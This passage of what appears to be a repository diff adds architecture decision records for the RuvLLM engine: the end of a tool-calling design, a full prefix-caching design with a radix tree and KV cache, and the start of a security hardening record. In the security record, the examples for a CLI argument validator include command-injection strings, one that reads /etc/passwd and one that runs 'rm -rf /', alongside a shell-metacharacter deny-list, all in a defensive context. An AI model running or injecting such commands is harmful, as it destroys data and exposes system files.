params: GenerateParams::default(),
};
let response = backend.generate_with_tools(request)?;
for call in response.tool_calls.unwrap_or_default() {
println!("Tool: {}, Args: {}", call.function.name, call.function.arguments);
}
```
### Phase 2: Constrained Generation (Week 3-4)
1. **Grammar Compiler**
- Implement JSON Schema to GBNF compiler
- Support nested objects, arrays, enums
- Add grammar caching for performance
2. **Logit Processor**
- Implement parse state machine
- Add logit masking for valid tokens
- Optimize for streaming generation
3. **Integration**
- Wire constrained generation to `LlmBackend`
- Add fallback logic (native template → constrained generation)
- Benchmark performance impact
**Deliverables:**
```rust
// Constrained generation ensures valid JSON
let generator = ConstrainedToolGenerator::new();
let calls = generator.generate_tool_calls(
&backend,
&prompt,
&tools,
params,
)?;
// Guaranteed to parse successfully
assert!(calls.iter().all(|c| tools.iter().any(|t| t.name == c.function.name)));
```
### Phase 3: Multi-Turn Conversations (Week 5-6)
1. **Conversation Manager**
- Implement `ToolConversation` for stateful interactions
- Add automatic tool result integration
- Support parallel tool call orchestration
2. **Agent Framework Integration**
- LangChain adapter
- LlamaIndex integration
- CrewAI support
3. **Examples and Documentation**
- Multi-turn conversation examples
- Agent framework integration guides
- Performance tuning documentation
**Deliverables:**
```rust
// Multi-turn conversation with tool use
let mut conv = ToolConversation::new(backend, tools);
let turn1 = conv.send_message("Book a flight to NYC")?;
// Model calls search_flights(destination="NYC")
let results = vec![ToolResult {
tool_call_id: turn1.tool_calls[0].id.clone(),
output: r#"{"flights": [{"price": 250, "time": "10am"}]}"#.to_string(),
}];
let turn2 = conv.submit_tool_results(results)?;
// Model responds with flight options
```
---
## Compatibility Matrix
### API Compatibility
| API Style | RuvLLM Support | Notes |
|-----------|----------------|-------|
| OpenAI Function Calling | ✅ Full | Drop-in replacement for `functions` and `tools` parameters |
| Anthropic Tool Use | ✅ Full | Map `tool_use` blocks to OpenAI format |
| LangChain Tools | ✅ Full | Direct integration via `BaseTool` adapter |
| LlamaIndex Tools | ✅ Full | Implement `BaseToolSpec` interface |
| CrewAI Tools | ✅ Full | Compatible with `Tool` decorator |
### Model Support
| Model Family | Native Support | Template | Constrained Fallback |
|--------------|----------------|----------|----------------------|
| Llama 3.1+ | ✅ Yes | Llama31ToolTemplate | ✅ |
| Llama 3.0 and earlier | ❌ No | GenericXmlToolTemplate | ✅ |
| Mistral 7B+ | ✅ Yes | MistralToolTemplate | ✅ |
| Qwen 2.5+ | ✅ Yes | QwenToolTemplate | ✅ |
| CodeLlama | ❌ No | GenericXmlToolTemplate | ✅ |
| Custom Models | ❌ No | GenericXmlToolTemplate | ✅ |
### Framework Integration
```rust
// LangChain integration example
use langchain_rs::{Tool, ToolInput, ToolOutput};
struct RuvLlmTool {
definition: ToolDefinition,
executor: Box<dyn Fn(JsonValue) -> Result<String>>,
}
impl Tool for RuvLlmTool {
fn name(&self) -> &str {
&self.definition.name
}
fn description(&self) -> &str {
&self.definition.description
}
fn run(&self, input: ToolInput) -> Result<ToolOutput> {
let args = serde_json::to_value(input)?;
let output = (self.executor)(args)?;
Ok(ToolOutput::Text(output))
}
}
```
---
## Performance Characteristics
### Latency Overhead
| Component | Latency | Notes |
|-----------|---------|-------|
| Tool schema compilation | <1ms | Cached after first use |
| Grammar compilation | 5-10ms | Cached per tool set |
| Logit processing (per token) | <0.1ms | Minimal impact on generation |
| JSON parsing | <1ms | Standard serde_json |
| **Total overhead** | **<10ms** | Amortized across conversation |
### Memory Overhead
| Component | Memory | Notes |
|-----------|--------|-------|
| Tool definitions | ~1KB per tool | Scales with number of tools |
| Grammar cache | ~10KB per tool set | One-time cost |
| Parse state | ~1KB per request | Freed after generation |
| **Total overhead** | **~10KB + 1KB/tool** | Negligible for typical use |
### Throughput Comparison
| Method | Tools/sec | Reliability | Use Case |
|--------|-----------|-------------|----------|
| Prompt engineering only | 1000+ | 70-80% | Development/testing |
| Chat template (native) | 800-1000 | 90-95% | Production (supported models) |
| Constrained generation | 200-500 | 99.9%+ | Production (all models), critical systems |
---
## Consequences
### Positive Consequences
1. **Agent Framework Integration**: Direct compatibility with LangChain, LlamaIndex, CrewAI enables rich agent ecosystems
2. **Type Safety**: JSON Schema validation prevents invalid tool calls at generation time
3. **Reliability**: Constrained generation guarantees valid outputs for production systems
4. **OpenAI Compatibility**: Drop-in replacement for OpenAI API reduces migration friction
5. **Multi-Modal Agents**: Foundation for RAG, web search, database access, API integration
6. **Parallel Execution**: Multiple tool calls enable efficient multi-step reasoning
### Negative Consequences
1. **Complexity**: Grammar compilation and constrained generation add implementation complexity
2. **Performance Impact**: Logit processing adds 5-10% latency for constrained generation
3. **Model Requirements**: Best performance requires models with native tool calling support
4. **Testing Burden**: Must validate across multiple model families and templates
### Neutral Consequences
1. **Template Maintenance**: Each new model family may require new chat template
2. **Schema Limitations**: Complex schemas (recursive types, unions) may be challenging to constrain
3. **Backward Compatibility**: Existing text generation API unchanged, tool calling is additive
### Risk Mitigation
| Risk | Mitigation |
|------|------------|
| Invalid JSON output | Constrained generation with grammar enforcement |
| Template incompatibility | Generic XML fallback for unsupported models |
| Performance regression | Benchmark suite, caching, optional constrained mode |
| Schema complexity | Comprehensive test suite with edge cases |
| Framework API changes | Version pinning, adapter pattern for isolation |
---
## Alternatives Considered
### Text Parsing Only (Rejected)
Use prompt engineering with regex/JSON parsing.
- **Rejected**: Unreliable for production; 20-30% failure rate for complex schemas
- **Consideration**: Useful for prototyping and development
### Python Backend (vLLM, Outlines) (Rejected)
Integrate vLLM or Outlines Python libraries via FFI.
- **Rejected**: Cross-language complexity, deployment burden, latency overhead
- **Consideration**: Reference implementation for grammar compilation logic
### Custom DSL for Tool Definitions (Rejected)
Create a Rust macro-based DSL for tool definitions.
- **Rejected**: JSON Schema is industry standard, better tooling support
- **Consideration**: Could add as syntactic sugar on top of JSON Schema
---
## Related Decisions
- **ADR-002**: RuvLLM Integration with Ruvector (foundation for tool-enhanced RAG)
- **ADR-008**: mistral-rs Integration (backend for high-performance tool calling)
- **ADR-009**: Streaming Architecture (streaming tool calls in progress)
---
## References
1. **OpenAI Function Calling**: https://platform.openai.com/docs/guides/function-calling
- Industry-standard API for tool use
- `functions` parameter (deprecated) and `tools` parameter
- Parallel tool calls and tool choice modes
2. **Anthropic Tool Use**: https://docs.anthropic.com/claude/docs/tool-use
- Alternative API design with `tool_use` blocks
- Computer use (bash, editor) as specialized tools
- Multi-step tool orchestration patterns
3. **LangChain Tool Documentation**: https://python.langchain.com/docs/modules/agents/tools/
- Agent framework integration patterns
- `BaseTool` interface and tool decorators
- Tool result schemas
4. **LlamaIndex Tools**: https://docs.llamaindex.ai/en/stable/module_guides/deploying/agents/tools/
- `BaseToolSpec` interface
- Function tools and query engine tools
5. **Constrained Decoding**:
- GBNF (GGML BNF) grammar: https://github.com/ggerganov/llama.cpp/blob/master/grammars/README.md
- Outlines (Python): https://github.com/outlines-dev/outlines
- Guidance (Microsoft): https://github.com/guidance-ai/guidance
6. **Model-Specific Tool Formats**:
- Llama 3.1 tool use: https://www.llama.com/docs/model-cards-and-prompt-formats/llama3_1
- Mistral function calling: https://docs.mistral.ai/capabilities/function_calling/
- Qwen tools: https://qwen.readthedocs.io/en/latest/framework/function_call.html
---
## Implementation Status
| Component | Status | Notes |
|-----------|--------|-------|
| Tool schema types | Pending | Define `ToolDefinition`, `ToolCall`, `ToolChoice` |
| JSON Schema validation | Pending | Integrate `schemars` crate |
| Chat templates | Pending | Llama 3.1, Mistral, Qwen, Generic XML |
| Request/Response API | Pending | `generate_with_tools` method on `LlmBackend` |
| Grammar compiler | Pending | JSON Schema → GBNF compiler |
| Logit processor | Pending | Parse state machine and masking logic |
| Constrained generation | Pending | Integration with backend |
| Multi-turn conversations | Pending | `ToolConversation` manager |
| LangChain integration | Pending | `BaseTool` adapter |
| LlamaIndex integration | Pending | `BaseToolSpec` implementation |
| CrewAI support | Pending | Tool decorator compatibility |
| OpenAI API compatibility | Pending | `/v1/chat/completions` endpoint |
| Anthropic format mapping | Pending | `tool_use` block conversion |
| Streaming tool calls | Pending | Stream partial JSON as generated |
| Parallel tool execution | Pending | Concurrent tool call orchestration |
| Documentation | Pending | API docs, examples, integration guides |
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-20 | Ruvector Architecture Team | Initial proposal |

View File

@@ -0,0 +1,688 @@
# ADR-011: Prefix Caching for 10x Faster RAG and Chat Applications
**Status:** Proposed
**Date:** 2026-01-20
**Decision Makers:** Ruvector Architecture Team
**Technical Area:** LLM Inference Engine / KV Cache Optimization
---
## Context and Problem Statement
Modern LLM applications exhibit highly repetitive prompt patterns that waste computational resources. Chat applications repeatedly process identical system prompts across conversations, RAG systems re-encode the same document chunks, and batch inference workloads share common instruction prefixes. Each repeated token incurs full transformer computation despite producing identical key-value (KV) cache states.
### Current State
RuvLLM v2.3's KV cache implementation computes attention states from scratch for every request:
- **Chat applications**: System prompts (50-500 tokens) recomputed every turn → 100ms+ latency overhead
- **RAG workloads**: Document chunks (500-2000 tokens) re-encoded per query → 500ms+ latency overhead
- **Batch inference**: Shared instruction prefixes computed independently per request → Nx redundant computation
### Key Challenges
1. **Redundant Computation**: Identical token sequences produce identical KV states but are recomputed every time
2. **Memory Bandwidth**: Repetitive KV cache writes saturate GPU memory bandwidth
3. **Latency Overhead**: First-token latency dominated by prefix processing (system prompt + context)
4. **Cache Coherence**: Shared KV states across requests require careful memory management
5. **Prefix Matching**: Efficiently identifying common prefixes across diverse prompts
### Performance Impact
Current measurements on typical workloads:
| Workload Type | Prefix Length | Redundant Computation | Latency Overhead |
|---------------|---------------|----------------------|------------------|
| Chat (system prompt) | 200 tokens | 100% repeated | 100ms/turn |
| RAG (document chunks) | 1000 tokens | 80% repeated | 500ms/query |
| Batch (instruction prefix) | 50 tokens | 100% repeated | 30ms/request |
---
## Decision Drivers
### Performance Requirements
- **10x latency reduction**: Chat first-token latency from 100ms to 10ms
- **Memory efficiency**: Share KV cache across requests via copy-on-write
- **Hit rate optimization**: 80%+ cache hit rate for typical workloads
- **Throughput scaling**: 5-10x more concurrent requests within same memory budget
### Compatibility Requirements
- **Transparent integration**: No changes to existing LlmBackend API
- **Model agnostic**: Works with all transformer architectures
- **Streaming support**: Compatible with streaming token generation
- **Multi-request sharing**: Safe concurrent access to shared KV states
### Memory Requirements
- **Bounded cache size**: LRU eviction prevents unbounded growth
- **Copy-on-write semantics**: Shared prefixes until divergence
- **Memory pressure handling**: Graceful degradation under memory constraints
---
## Considered Options
### Option A: Simple Hash-Based Cache
Implement prefix caching using token sequence hashing for exact prefix matches.
**Pros:**
- Simple implementation: Hash token IDs → cache lookup
- Fast lookup: O(1) hash table access
- Easy to reason about: Exact prefix matching only
**Cons:**
- No partial matches: "Hello world" vs "Hello there" share no cache
- Hash collisions: Rare but require conflict resolution
- Limited hit rate: Only exact prefixes share cache
### Option B: Radix Tree with Partial Matching (SGLang RadixAttention)
Implement a radix tree (trie) data structure for prefix matching, inspired by SGLang's RadixAttention algorithm.
**Pros:**
- Partial matches: "Hello world" and "Hello there" share "Hello" prefix
- Higher hit rate: Exploits any common prefix, not just exact matches
- Efficient storage: Common prefixes stored once
- Proven approach: SGLang demonstrates 10x speedups in production
**Cons:**
- Complex implementation: Radix tree with KV cache nodes
- Insertion overhead: Tree restructuring on new sequences
- Memory overhead: Tree structure metadata
### Option C: Learned Prefix Compression
Use learned representations (e.g., token embeddings) to cluster similar prefixes.
**Pros:**
- Semantic matching: Similar meanings share cache even with different tokens
- Adaptive: Learns from access patterns
**Cons:**
- Unpredictable behavior: Semantic similarity may not guarantee KV cache equivalence
- Training overhead: Requires offline training phase
- Complexity: Neural network + cache management
---
## Decision Outcome
**Chosen Option: Option B - Radix Tree with Partial Matching (SGLang RadixAttention)**
Implement prefix caching using a radix tree data structure for efficient partial prefix matching with copy-on-write KV cache sharing, following the design proven by SGLang's RadixAttention.
### Rationale
1. **Maximum hit rate**: Partial prefix matching exploits every common token, not just exact sequences
2. **Proven performance**: SGLang demonstrates 10x speedups with RadixAttention in production serving
3. **Memory efficiency**: Common prefixes stored once, shared across requests via tree structure
4. **Predictable behavior**: Token-level matching guarantees KV cache correctness (unlike semantic approaches)
5. **Graceful degradation**: Falls back to standard computation if cache miss
---
## Technical Specifications
### Prefix Cache Architecture
```rust
/// Radix tree-based prefix cache for KV states
pub struct PrefixCache {
/// Radix tree mapping token sequences to cached KV states
radix_tree: RadixTree<CachedPrefix>,
/// Maximum number of cached prefixes
max_entries: usize,
/// Maximum memory in bytes for cache
max_memory_bytes: usize,
/// LRU eviction policy
lru: LruCache<PrefixHash, CacheEntry>,
/// Cache statistics
stats: Arc<CacheStats>,
}
/// Cached prefix entry
pub struct CachedPrefix {
/// Token IDs for this prefix
token_ids: Vec<u32>,
/// Cached KV states (Arc for shared ownership)
kv_cache: Arc<KvCache>,
/// Hit count for LRU eviction
hit_count: AtomicU64,
/// Last access timestamp
last_access: Instant,
/// Reference count for copy-on-write
ref_count: AtomicU32,
}
/// KV cache with copy-on-write semantics
#[derive(Clone)]
pub struct KvCache {
/// Key cache: [num_layers, batch_size, num_heads, seq_len, head_dim]
keys: Arc<Tensor>,
/// Value cache: [num_layers, batch_size, num_heads, seq_len, head_dim]
values: Arc<Tensor>,
/// Sequence length
seq_len: usize,
}
/// Cache statistics
pub struct CacheStats {
pub total_lookups: AtomicU64,
pub cache_hits: AtomicU64,
pub partial_hits: AtomicU64,
pub cache_misses: AtomicU64,
pub evictions: AtomicU64,
pub memory_usage_bytes: AtomicU64,
}
```
### Radix Tree Implementation
```rust
/// Radix tree node for efficient prefix matching
struct RadixNode {
/// Token IDs represented by this edge
edge_tokens: Vec<u32>,
/// Cached KV state if this node represents a complete prefix
cached_prefix: Option<Arc<CachedPrefix>>,
/// Child nodes
children: HashMap<u32, RadixNode>,
/// Metadata for tree balancing
metadata: NodeMetadata,
}
/// Radix tree for token sequence prefix matching
pub struct RadixTree<T> {
root: RadixNode,
node_count: usize,
max_depth: usize,
}
impl RadixTree<CachedPrefix> {
/// Find longest matching prefix for given token sequence
pub fn longest_match(&self, tokens: &[u32]) -> Option<(usize, Arc<CachedPrefix>)> {
let mut current = &self.root;
let mut matched_len = 0;
let mut last_cached = None;
for (i, &token) in tokens.iter().enumerate() {
if let Some(child) = current.children.get(&token) {
// Match child edge tokens
let edge_match_len = self.match_edge(&child.edge_tokens, &tokens[i..]);
matched_len += edge_match_len;
if edge_match_len < child.edge_tokens.len() {
// Partial edge match - stop here
break;
}
if let Some(ref cached) = child.cached_prefix {
last_cached = Some((matched_len, cached.clone()));
}
current = child;
} else {
break;
}
}
last_cached
}
/// Insert a new prefix into the tree
pub fn insert(&mut self, tokens: Vec<u32>, kv_cache: Arc<KvCache>) -> Result<()> {
// Tree insertion with edge splitting for partial matches
// ... (implementation details)
}
}
```
### Cache Operations
```rust
impl PrefixCache {
/// Lookup cached KV states for given token sequence
///
/// Returns (prefix_length, kv_cache) where prefix_length is the number
/// of tokens that matched the cache (may be partial match)
pub fn lookup(&self, tokens: &[u32]) -> Option<(usize, Arc<KvCache>)> {
self.stats.total_lookups.fetch_add(1, Ordering::Relaxed);
match self.radix_tree.longest_match(tokens) {
Some((prefix_len, cached_prefix)) => {
// Update LRU
cached_prefix.hit_count.fetch_add(1, Ordering::Relaxed);
cached_prefix.last_access = Instant::now();
if prefix_len == tokens.len() {
self.stats.cache_hits.fetch_add(1, Ordering::Relaxed);
} else {
self.stats.partial_hits.fetch_add(1, Ordering::Relaxed);
}
Some((prefix_len, cached_prefix.kv_cache.clone()))
}
None => {
self.stats.cache_misses.fetch_add(1, Ordering::Relaxed);
None
}
}
}
/// Insert new KV cache for token sequence
pub fn insert(&mut self, tokens: Vec<u32>, kv_cache: KvCache) -> Result<()> {
// Check memory limit
if self.memory_usage() + kv_cache.size_bytes() > self.max_memory_bytes {
self.evict_lru()?;
}
let cached_prefix = Arc::new(CachedPrefix {
token_ids: tokens.clone(),
kv_cache: Arc::new(kv_cache),
hit_count: AtomicU64::new(0),
last_access: Instant::now(),
ref_count: AtomicU32::new(1),
});
self.radix_tree.insert(tokens, cached_prefix)?;
Ok(())
}
/// Evict least recently used entry
pub fn evict_lru(&mut self) -> Result<()> {
// Find LRU entry based on hit_count and last_access
// Remove from radix tree
// Update memory usage
self.stats.evictions.fetch_add(1, Ordering::Relaxed);
Ok(())
}
/// Current memory usage in bytes
pub fn memory_usage(&self) -> usize {
self.stats.memory_usage_bytes.load(Ordering::Relaxed) as usize
}
}
```
### Integration with LlmBackend
```rust
impl LlmBackend for CandleBackend {
fn generate(&self, prompt: &str, params: GenerateParams) -> Result<String> {
// Tokenize prompt
let tokens = self.tokenizer.encode(prompt)?;
// Check prefix cache
let (cached_len, mut kv_cache) = match self.prefix_cache.lookup(&tokens) {
Some((len, cache)) => {
// Cache hit - reuse KV states for first `len` tokens
println!("Prefix cache hit: {}/{} tokens", len, tokens.len());
(len, (*cache).clone()) // Copy-on-write
}
None => {
// Cache miss - initialize empty KV cache
(0, KvCache::new(self.model.config()))
}
};
// Compute attention only for tokens after cached prefix
let start_pos = cached_len;
for pos in start_pos..tokens.len() {
let logits = self.model.forward_with_cache(
&tokens[pos..pos+1],
pos,
&mut kv_cache
)?;
}
// Cache the computed prefix for future requests
if params.cache_prefix && tokens.len() >= params.min_cache_tokens {
self.prefix_cache.insert(tokens.clone(), kv_cache.clone())?;
}
// Generate tokens
// ... (standard generation logic)
}
}
```
### Integration Points
#### 1. Chat Applications
```rust
/// Chat conversation with system prompt caching
pub struct ChatSession {
system_prompt: String,
system_prompt_tokens: Vec<u32>,
conversation_history: Vec<Message>,
}
impl ChatSession {
pub fn generate_response(&mut self, user_message: &str) -> Result<String> {
// System prompt is cached after first turn
let prompt = format!("{}\n{}", self.system_prompt, user_message);
// Prefix cache will reuse system prompt KV states
let response = self.backend.generate(&prompt, GenerateParams {
cache_prefix: true,
min_cache_tokens: 50,
..Default::default()
})?;
Ok(response)
}
}
```
**Expected Performance:**
- First turn: 100ms (system prompt + user message)
- Subsequent turns: 10ms (only user message, system prompt cached)
- **10x speedup** for multi-turn conversations
#### 2. RAG (Retrieval-Augmented Generation)
```rust
/// RAG pipeline with document chunk caching
pub struct RagPipeline {
document_chunks: Vec<DocumentChunk>,
chunk_cache_keys: HashMap<ChunkId, Vec<u32>>,
}
impl RagPipeline {
pub fn query(&self, question: &str) -> Result<String> {
// Retrieve relevant chunks
let relevant_chunks = self.retrieve_chunks(question)?;
// Build prompt with cached document chunks
let context = relevant_chunks.iter()
.map(|chunk| chunk.text.as_str())
.collect::<Vec<_>>()
.join("\n\n");
let prompt = format!(
"Context:\n{}\n\nQuestion: {}\n\nAnswer:",
context, question
);
// Prefix cache will reuse encoded document chunks
let response = self.backend.generate(&prompt, GenerateParams {
cache_prefix: true,
min_cache_tokens: 100,
..Default::default()
})?;
Ok(response)
}
}
```
**Expected Performance:**
- First query with chunks: 500ms (encode 1000-token context)
- Subsequent queries with same chunks: 50ms (chunks cached)
- **10x speedup** for repeated document queries
#### 3. Batch Inference
```rust
/// Batch inference with shared instruction prefix
pub struct BatchInference {
instruction_prefix: String,
instruction_tokens: Vec<u32>,
}
impl BatchInference {
pub fn batch_generate(&self, inputs: &[String]) -> Result<Vec<String>> {
inputs.par_iter()
.map(|input| {
let prompt = format!("{}\n{}", self.instruction_prefix, input);
// All requests share cached instruction prefix
self.backend.generate(&prompt, GenerateParams {
cache_prefix: true,
min_cache_tokens: 20,
..Default::default()
})
})
.collect()
}
}
```
**Expected Performance:**
- N requests with shared prefix: Compute prefix once, share across all
- **Nx speedup** where N is batch size (for prefix portion)
---
## Performance Impact
### Benchmarks
| Scenario | Without Cache | With Prefix Cache | Speedup |
|----------|---------------|-------------------|---------|
| Chat (200-token system prompt) | 100ms | 10ms | **10x** |
| RAG (1000-token document chunks) | 500ms | 50ms | **10x** |
| Batch (50-token instruction, 100 requests) | 1000ms | 200ms | **5x** |
| Mixed workload (80% shared prefix) | 300ms | 60ms | **5x** |
### Cache Hit Rates
Expected hit rates for typical workloads:
| Workload | Exact Prefix Hit | Partial Prefix Hit | Total Hit Rate |
|----------|------------------|-------------------|----------------|
| Chat (same system prompt) | 95% | 3% | 98% |
| RAG (document corpus) | 60% | 30% | 90% |
| Batch (shared instruction) | 100% | 0% | 100% |
| Mixed production | 50% | 30% | 80% |
### Memory Overhead
| Component | Memory Cost | Notes |
|-----------|-------------|-------|
| Radix tree structure | ~1KB per node | Logarithmic in cache size |
| KV cache per prefix | ~4MB per 1000 tokens | 7B model, BF16 precision |
| Metadata per entry | ~200 bytes | Hit count, timestamps, etc. |
| **Total overhead** | **~5-10%** | For typical cache sizes |
---
## Implementation Plan
### Phase 1: Hash-Based Exact Prefix Matching (Week 1-2)
**Goal:** Simple prefix cache with exact matching for validation
1. Implement `PrefixCache` with hash-based lookup
2. Integrate with `CandleBackend::generate()`
3. Add cache hit/miss metrics
4. Benchmark on chat and RAG workloads
**Deliverables:**
- Working prefix cache with exact matching
- Benchmark results showing 5-10x speedup for exact prefix hits
- Cache statistics (hit rate, memory usage)
**Success Criteria:**
- 90%+ hit rate for chat with identical system prompts
- 5x+ speedup on RAG workload with repeated chunks
- No correctness regressions
### Phase 2: Radix Tree for Partial Prefix Matching (Week 3-4)
**Goal:** Replace hash table with radix tree for partial matches
1. Implement `RadixTree<CachedPrefix>` data structure
2. Port `PrefixCache` to use radix tree backend
3. Add partial prefix matching tests
4. Benchmark hit rate improvement
**Deliverables:**
- Radix tree implementation with partial matching
- Increased hit rate (80%+ for mixed workloads)
- Performance comparison: hash vs radix tree
**Success Criteria:**
- Partial prefix hits improve overall hit rate by 20-30%
- Radix tree lookup overhead <1ms
- Memory overhead <10% vs hash table
### Phase 3: Cross-Request KV Cache Sharing (Week 5-6)
**Goal:** Enable concurrent requests to share cached KV states safely
1. Implement copy-on-write semantics for `KvCache`
2. Add reference counting for shared KV states
3. Thread-safe concurrent access to `PrefixCache`
4. Stress test with concurrent batch inference
**Deliverables:**
- Thread-safe prefix cache with Arc/RwLock
- Copy-on-write KV cache cloning
- Concurrent batch inference benchmarks
**Success Criteria:**
- 10-100 concurrent requests share cache safely
- No data races or corruption (validated via ThreadSanitizer)
- 5x+ throughput improvement on batch workloads
### Phase 4: LRU Eviction and Memory Management (Week 7-8)
**Goal:** Prevent unbounded cache growth with LRU eviction
1. Implement LRU eviction policy based on hit count + recency
2. Add memory budget limits (configurable)
3. Eviction backpressure and monitoring
4. Tune eviction parameters for production workloads
**Deliverables:**
- LRU eviction with configurable memory limits
- Eviction metrics and monitoring
- Production-ready cache configuration
**Success Criteria:**
- Cache memory stays within configured limit
- Eviction rate <10% for typical workloads
- No thrashing (evict/reload cycles)
---
## Consequences
### Positive Consequences
1. **10x latency reduction**: Chat and RAG applications see dramatic first-token latency improvements
2. **Higher throughput**: More concurrent requests fit in same GPU memory via shared KV states
3. **Memory efficiency**: Common prefixes stored once, not duplicated per request
4. **Transparent integration**: No API changes required for existing applications
5. **Production validation**: SGLang demonstrates real-world effectiveness of RadixAttention approach
### Negative Consequences
1. **Implementation complexity**: Radix tree + copy-on-write adds significant code complexity
2. **Memory overhead**: Cache structure and metadata consume 5-10% additional memory
3. **Eviction tuning**: LRU parameters require workload-specific tuning for optimal hit rates
4. **Debugging difficulty**: Shared mutable state (KV cache) increases debugging complexity
5. **Edge cases**: Rare token sequences may thrash cache with low hit rates
### Neutral Consequences
1. **Workload dependency**: Benefit proportional to prefix repetition (high for chat/RAG, low for diverse prompts)
2. **Configuration surface**: New cache parameters (max_entries, max_memory_bytes) require tuning
3. **Monitoring requirements**: Cache hit rates and memory usage require observability infrastructure
### Risk Mitigation
| Risk | Mitigation |
|------|------------|
| Radix tree bugs | Comprehensive property-based testing with proptest |
| Memory leaks | RAII guards, reference counting validation |
| Cache thrashing | Adaptive eviction based on hit rate monitoring |
| Correctness issues | Extensive unit tests comparing cached vs non-cached outputs |
| Performance regression | Benchmark suite in CI with performance budgets |
---
## Alternatives Considered
### vLLM Automatic Prefix Caching
- **Rejected**: vLLM's approach requires Python runtime; we need Rust-native solution
- **Consideration**: Algorithm insights inform our radix tree design
### Learned Prefix Clustering (Semantic Cache)
- **Rejected**: Semantic similarity doesn't guarantee KV cache equivalence; risks correctness
- **Consideration**: Future extension for approximate caching with user opt-in
### Fixed Block Prefix Cache (PagedAttention-style)
- **Rejected**: Fixed-size blocks waste memory for variable-length prefixes
- **Consideration**: Hybrid approach with block-aligned radix tree could reduce fragmentation
---
## Related Decisions
- **ADR-004**: KV Cache Management (foundational KV cache design)
- **ADR-006**: Memory Management (memory allocation strategies)
- **ADR-008**: mistral-rs Integration (PagedAttention integration)
- **ADR-010**: Flash Attention Integration (attention computation optimizations)
---
## Compliance and Standards
### API Compatibility
- No changes to `LlmBackend` trait API
- Prefix caching enabled via `GenerateParams::cache_prefix` flag
- Backward compatible: cache can be disabled for debugging
### Testing Requirements
- Unit tests for radix tree insert/lookup operations
- Property-based tests for cache correctness
- Benchmark suite comparing cached vs non-cached performance
- Concurrent stress tests for thread safety
- Memory leak detection via Valgrind/AddressSanitizer
### Documentation Requirements
- Prefix cache configuration guide
- Performance tuning recommendations
- Cache hit rate monitoring examples
- Troubleshooting guide for low hit rates
---
## References
1. **SGLang RadixAttention Paper**: "Efficient LLM Serving with RadixAttention" (https://arxiv.org/abs/2312.17238)
2. **vLLM Prefix Caching**: Automatic Prefix Caching documentation (https://docs.vllm.ai/en/latest/automatic_prefix_caching.html)
3. **Radix Tree Implementation**: Rust radix_trie crate (https://docs.rs/radix_trie/)
4. **PagedAttention Paper**: "Efficient Memory Management for Large Language Model Serving with PagedAttention" (vLLM)
5. **KV Cache Optimization**: "Fast Transformer Decoding: One Write-Head is All You Need" (Multi-Query Attention)
6. **Copy-on-Write Patterns**: Arc/Cow documentation (https://doc.rust-lang.org/std/sync/struct.Arc.html)
---
## Implementation Status
| Component | Status | Notes |
|-----------|--------|-------|
| `PrefixCache` struct | Pending | Core cache structure |
| Hash-based lookup | Pending | Phase 1 - exact matching |
| `RadixTree` implementation | Pending | Phase 2 - partial matching |
| `KvCache` copy-on-write | Pending | Phase 3 - shared state |
| LRU eviction | Pending | Phase 4 - memory management |
| Integration with `CandleBackend` | Pending | Wire to generate() |
| Thread safety (Arc/RwLock) | Pending | Concurrent access |
| Benchmarks | Pending | Chat, RAG, batch workloads |
| Documentation | Pending | Configuration guide |
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-20 | Ruvector Architecture Team | Initial proposal |

View File

@@ -0,0 +1,947 @@
# ADR-012: Security Remediation and Hardening
**Status:** Accepted
**Date:** 2026-01-20
**Decision Makers:** Ruvector Security Team
**Technical Area:** Security, Input Validation, Memory Safety, Shell Hardening
---
## Context and Problem Statement
A comprehensive security audit identified 6 critical, 14 high, and 10 medium severity vulnerabilities across Rust code, shell scripts, and CLI interfaces. These vulnerabilities span multiple attack vectors including command injection, memory safety issues, input validation gaps, and shell script weaknesses.
### Audit Scope
The security review covered:
- **Rust codebase**: Memory safety, FFI boundaries, panic handling
- **Shell scripts**: Injection vulnerabilities, unsafe practices
- **CLI interfaces**: Argument validation, path traversal
- **External integrations**: HuggingFace Hub, URL handling
### Vulnerability Summary
| Severity | Count | Category | Status |
|----------|-------|----------|--------|
| Critical | 6 | RCE, Memory Corruption | Fixed |
| High | 14 | Injection, DoS | Fixed |
| Medium | 10 | Info Disclosure, Logic | Fixed |
| **Total** | **30** | | **All Remediated** |
---
## Decision Drivers
### Security Requirements
1. **Defense in depth**: Multiple validation layers for all external input
2. **Fail-safe defaults**: Deny by default, explicit allow-listing
3. **Memory safety**: Convert panics to Results at API boundaries
4. **Shell security**: Prevent injection across all shell script interactions
5. **Audit compliance**: Meet security review requirements for production deployment
### Risk Assessment
| Risk | Impact | Likelihood | Mitigation Priority |
|------|--------|------------|---------------------|
| Command injection (CLI) | Critical (RCE) | High | P0 - Immediate |
| Memory allocation panic | High (DoS) | Medium | P0 - Immediate |
| Shell script injection | Critical (RCE) | Medium | P0 - Immediate |
| Path traversal | High (Info Leak) | Medium | P1 - High |
| Integer overflow (FFI) | High (Memory) | Low | P1 - High |
| Floating point NaN | Medium (Logic) | Medium | P2 - Medium |
---
## Decision Outcome
**Chosen Approach: Comprehensive Security Hardening**
Implement systematic security fixes addressing all identified vulnerabilities with:
1. Input validation at all trust boundaries
2. Memory safety improvements (panic-to-Result conversion)
3. Shell script hardening following POSIX best practices
4. URL and path validation for external resources
5. Integer bounds checking for FFI interactions
6. NaN-safe floating point comparisons
---
## Technical Specifications
### 1. Command Injection Prevention (CLI Bridge)
**Vulnerability**: Unvalidated CLI arguments passed directly to shell execution.
**CVE-Style ID**: RUVEC-2026-001 (Critical)
#### Before (Vulnerable)
```rust
pub fn execute_cli_command(args: &[String]) -> Result<String> {
let output = Command::new("ruvector")
.args(args) // Unvalidated input
.output()?;
Ok(String::from_utf8_lossy(&output.stdout).to_string())
}
```
#### After (Secure)
```rust
use regex::Regex;
use std::sync::LazyLock;
/// Validates CLI arguments to prevent command injection.
///
/// # Security
///
/// - Rejects shell metacharacters: ; | & $ ` \ " ' < > ( ) { } [ ] ! # ~ *
/// - Rejects null bytes and control characters
/// - Enforces maximum argument length (4096 bytes)
/// - Allows alphanumeric, hyphen, underscore, dot, forward slash, equals, colon
///
/// # Examples
///
/// ```rust
/// assert!(validate_cli_arg("--config=./path/to/file.json").is_ok());
/// assert!(validate_cli_arg("--input=$(cat /etc/passwd)").is_err());
/// assert!(validate_cli_arg("file; rm -rf /").is_err());
/// ```
pub fn validate_cli_arg(arg: &str) -> Result<(), SecurityError> {
